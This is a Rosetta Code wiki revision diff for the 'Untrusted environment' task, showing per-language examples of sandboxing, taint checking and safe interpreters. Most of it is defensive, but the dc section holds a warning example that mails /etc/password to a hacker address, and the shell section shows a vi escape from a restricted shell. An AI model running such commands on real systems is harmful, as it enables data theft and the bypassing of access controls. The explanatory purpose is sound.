Untrusted environment: Difference between revisions
Content added Content deleted
m (→{{header|Phix}}: colour hiccup) |
Thundergnat (talk | contribs) m (syntax highlighting fixup automation) |
||
| Line 30: | Line 30: | ||
Beware of allowing user input to fed to the reverse polish calculator. It has the ability to run shell commands, and this could be a security risk: |
Beware of allowing user input to fed to the reverse polish calculator. It has the ability to run shell commands, and this could be a security risk: |
||
< |
<syntaxhighlight lang="dc">`!'cat /etc/password|mail badguy@hackersrus.com</syntaxhighlight> |
||
=={{header|Go}}== |
=={{header|Go}}== |
||
| Line 40: | Line 40: | ||
The following example shows how to use a combination of reflection and pointer arithmetic to indirectly (and unsafely) change the contents of a byte slice. |
The following example shows how to use a combination of reflection and pointer arithmetic to indirectly (and unsafely) change the contents of a byte slice. |
||
< |
<syntaxhighlight lang="go">package main |
||
import ( |
import ( |
||
| Line 58: | Line 58: | ||
} |
} |
||
fmt.Println(string(bs)) |
fmt.Println(string(bs)) |
||
}</ |
}</syntaxhighlight> |
||
{{out}} |
{{out}} |
||
| Line 103: | Line 103: | ||
=={{header|Lua}}== |
=={{header|Lua}}== |
||
Lua supports protected calls and custom environments. Details have changed through various versions, and the specifics can become quite involved if/as needed, however the following might suffice as a simple example for Lua 5.2 or 5.3. |
Lua supports protected calls and custom environments. Details have changed through various versions, and the specifics can become quite involved if/as needed, however the following might suffice as a simple example for Lua 5.2 or 5.3. |
||
< |
<syntaxhighlight lang="lua">local untrusted = [[ |
||
print("hello") -- safe |
print("hello") -- safe |
||
for i = 1, 7 do print(i, i*i) end -- safe |
for i = 1, 7 do print(i, i*i) end -- safe |
||
| Line 110: | Line 110: | ||
sandbox = { print=print } |
sandbox = { print=print } |
||
local ret, msg = pcall(load(untrusted,nil,nil,sandbox)) |
local ret, msg = pcall(load(untrusted,nil,nil,sandbox)) |
||
print("ret, msg:", ret, msg)</ |
print("ret, msg:", ret, msg)</syntaxhighlight> |
||
{{out}} |
{{out}} |
||
<pre>hello |
<pre>hello |
||
| Line 150: | Line 150: | ||
GP has a default, <code>secure</code>, which disallows the <code>system</code> and <code>extern</code> commands. Once activated this default cannot be removed without input from the user (i.e., not a script). |
GP has a default, <code>secure</code>, which disallows the <code>system</code> and <code>extern</code> commands. Once activated this default cannot be removed without input from the user (i.e., not a script). |
||
< |
<syntaxhighlight lang="parigp">default(secure,1); |
||
system("del file.txt"); |
system("del file.txt"); |
||
default(secure,0); \\ Ineffective without user input</ |
default(secure,0); \\ Ineffective without user input</syntaxhighlight> |
||
=={{header|Perl}}== |
=={{header|Perl}}== |
||
Perl can be invoked in taint mode with the command line option <code>-T</code>. While in this mode input from the user, and all variables derived from it, cannot be used in certain contexts until 'sanitized' by being passed through a regular expression. |
Perl can be invoked in taint mode with the command line option <code>-T</code>. While in this mode input from the user, and all variables derived from it, cannot be used in certain contexts until 'sanitized' by being passed through a regular expression. |
||
< |
<syntaxhighlight lang="perl">#!/usr/bin/perl -T |
||
my $f = $ARGV[0]; |
my $f = $ARGV[0]; |
||
open FILE, ">$f" or die 'Cannot open file for writing'; |
open FILE, ">$f" or die 'Cannot open file for writing'; |
||
print FILE "Modifying an arbitrary file\n"; |
print FILE "Modifying an arbitrary file\n"; |
||
close FILE;</ |
close FILE;</syntaxhighlight> |
||
=={{header|Phix}}== |
=={{header|Phix}}== |
||
'''with safe_mode''' disables most potentially dangerous features such as file i/o, and invoking c_func/proc() or using inline assembly outside of Phix\builtins\, which should make it safer to try out code from an untrusted source. It behaves identically to a -safe command line option, however relying on the latter risks leaving a dangerous file lying around that might accidentally be run without the proper command line flag in some idle moment much later, whereas of course if you put it in the source, that's not such an issue. |
'''with safe_mode''' disables most potentially dangerous features such as file i/o, and invoking c_func/proc() or using inline assembly outside of Phix\builtins\, which should make it safer to try out code from an untrusted source. It behaves identically to a -safe command line option, however relying on the latter risks leaving a dangerous file lying around that might accidentally be run without the proper command line flag in some idle moment much later, whereas of course if you put it in the source, that's not such an issue. |
||
<!--< |
<!--<syntaxhighlight lang="phix">(phixonline)--> |
||
<span style="color: #000080;font-style:italic;">-- demo\rosetta\safe_mode.exw |
<span style="color: #000080;font-style:italic;">-- demo\rosetta\safe_mode.exw |
||
-- |
-- |
||
| Line 181: | Line 181: | ||
--#ilASM{ mov eax,1 } |
--#ilASM{ mov eax,1 } |
||
-- The above would be rejected outright by pwa/p2js anyway, with or without safe_mode</span> |
-- The above would be rejected outright by pwa/p2js anyway, with or without safe_mode</span> |
||
<!--</ |
<!--</syntaxhighlight>--> |
||
Note that builtins\VM\pDiagN.e has to switch it off (eg to write an ex.err file when the program crashes), which is trivial to do but only via #ilASM{}, so a malicious programmer simply cannot, that is, as long as you actually use safe_mode, and don't ever put untrusted code into the builtins\ directory. Special allowances are made for mpfr.e (aka gmp) and pGUI.e (aka IUP), since they're not inherently dangerous; there might be some other libraries that deserve similar treatment. |
Note that builtins\VM\pDiagN.e has to switch it off (eg to write an ex.err file when the program crashes), which is trivial to do but only via #ilASM{}, so a malicious programmer simply cannot, that is, as long as you actually use safe_mode, and don't ever put untrusted code into the builtins\ directory. Special allowances are made for mpfr.e (aka gmp) and pGUI.e (aka IUP), since they're not inherently dangerous; there might be some other libraries that deserve similar treatment. |
||
| Line 197: | Line 197: | ||
=={{header|Racket}}== |
=={{header|Racket}}== |
||
The <tt>racket/sandbox</tt> library provides a way to construct limited evaluators which are prohibited from using too much time, memory, read/write/execute files, using the network, etc. |
The <tt>racket/sandbox</tt> library provides a way to construct limited evaluators which are prohibited from using too much time, memory, read/write/execute files, using the network, etc. |
||
< |
<syntaxhighlight lang="racket"> |
||
#lang racket |
#lang racket |
||
(require racket/sandbox) |
(require racket/sandbox) |
||
(define e (make-evaluator 'racket)) |
(define e (make-evaluator 'racket)) |
||
(e '(...unsafe code...)) |
(e '(...unsafe code...)) |
||
</syntaxhighlight> |
|||
</lang> |
|||
The idea is that a default sandbox is suitable for running arbitrary code without any of the usual risks. The library can also be used with many different configurations, to lift some of the restriction, which is more fitting in different cases. |
The idea is that a default sandbox is suitable for running arbitrary code without any of the usual risks. The library can also be used with many different configurations, to lift some of the restriction, which is more fitting in different cases. |
||
| Line 232: | Line 232: | ||
For example, given ''cat.rexx'': |
For example, given ''cat.rexx'': |
||
< |
<syntaxhighlight lang="rexx">ADDRESS SYSTEM 'cat cat.rexx'</syntaxhighlight> |
||
{{out}} |
{{out}} |
||
| Line 246: | Line 246: | ||
=={{header|Ruby}}== |
=={{header|Ruby}}== |
||
Ruby handles untrusted input with the global variable <code>$SAFE</code>. Settings higher than 0 invoke an increasing level of sandboxing and general paranoia. |
Ruby handles untrusted input with the global variable <code>$SAFE</code>. Settings higher than 0 invoke an increasing level of sandboxing and general paranoia. |
||
< |
<syntaxhighlight lang="ruby">require 'cgi' |
||
$SAFE = 4 |
$SAFE = 4 |
||
cgi = CGI::new("html4") |
cgi = CGI::new("html4") |
||
eval(cgi["arbitrary_input"].to_s)</ |
eval(cgi["arbitrary_input"].to_s)</syntaxhighlight> |
||
=={{header|Rust}}== |
=={{header|Rust}}== |
||
| Line 273: | Line 273: | ||
=={{header|Tcl}}== |
=={{header|Tcl}}== |
||
Tcl allows evaluation of untrusted code through ''safe interpreters'', which are evaluation contexts where all unsafe operations are removed. This includes access to the filesystem, access to environment variables, the opening of sockets, description of the platform, etc. |
Tcl allows evaluation of untrusted code through ''safe interpreters'', which are evaluation contexts where all unsafe operations are removed. This includes access to the filesystem, access to environment variables, the opening of sockets, description of the platform, etc. |
||
< |
<syntaxhighlight lang="tcl">set context [interp create -safe] |
||
$context eval $untrustedCode</ |
$context eval $untrustedCode</syntaxhighlight> |
||
Because the only way that Tcl code can perform an operation is by invoking a command if that command is not present in the execution context then the functionality is gone. |
Because the only way that Tcl code can perform an operation is by invoking a command if that command is not present in the execution context then the functionality is gone. |
||
It is possible to profile in restricted versions of operations to allow things like access to built-in packages. |
It is possible to profile in restricted versions of operations to allow things like access to built-in packages. |
||
< |
<syntaxhighlight lang="tcl">set context [safe::interpCreate] |
||
$context eval $untrustedCode</ |
$context eval $untrustedCode</syntaxhighlight> |
||
These work by installing aliases from the otherwise-removed commands in the safe interpreter to implementations of the commands in the parent master interpreter that take care to restrict what can be accessed. Note that the majority of unsafe operations are still not present, and the paths supported to the packages are virtualized; no hole is opened up for performing unsafe operations unless a package author is deliberately careless in their C implementation. |
These work by installing aliases from the otherwise-removed commands in the safe interpreter to implementations of the commands in the parent master interpreter that take care to restrict what can be accessed. Note that the majority of unsafe operations are still not present, and the paths supported to the packages are virtualized; no hole is opened up for performing unsafe operations unless a package author is deliberately careless in their C implementation. |
||
| Line 287: | Line 287: | ||
Variable references should be contained in double quotes to prevent an empty string causing an error as a result of omission during evaluation: |
Variable references should be contained in double quotes to prevent an empty string causing an error as a result of omission during evaluation: |
||
< |
<syntaxhighlight lang="sh"># num=`expr $num + 1` # This may error if num is an empty string |
||
num=`expr "$num" + 1` # The quotes are an improvement</ |
num=`expr "$num" + 1` # The quotes are an improvement</syntaxhighlight> |
||
=== Do not allow users to run programs that can launch a new shell === |
=== Do not allow users to run programs that can launch a new shell === |
||
| Line 301: | Line 301: | ||
However, the restricted shell is not completely secure. A user can break out of the restricted environment by running a program that features a shell function. The following is an example of the shell function in vi being used to escape from the restricted shell: |
However, the restricted shell is not completely secure. A user can break out of the restricted environment by running a program that features a shell function. The following is an example of the shell function in vi being used to escape from the restricted shell: |
||
< |
<syntaxhighlight lang="vi">vi |
||
:set shell=/bin/sh |
:set shell=/bin/sh |
||
:shell</ |
:shell</syntaxhighlight> |
||
=== Use a chroot jail === |
=== Use a chroot jail === |
||
Sometimes chroot jails are used to add a layer of security to |
Sometimes chroot jails are used to add a layer of security to |
||
< |
<syntaxhighlight lang="bash">mkdir ~/jail |
||
cd ~/jail; |
cd ~/jail; |
||
chroot ~/jail; |
chroot ~/jail; |
||
setuid(9); # if 9 is the userid of a non-root user |
setuid(9); # if 9 is the userid of a non-root user |
||
rm /etc/hosts # actually points to ~/jail/etc/hosts</ |
rm /etc/hosts # actually points to ~/jail/etc/hosts</syntaxhighlight> |
||
=={{header|Wren}}== |
=={{header|Wren}}== |
||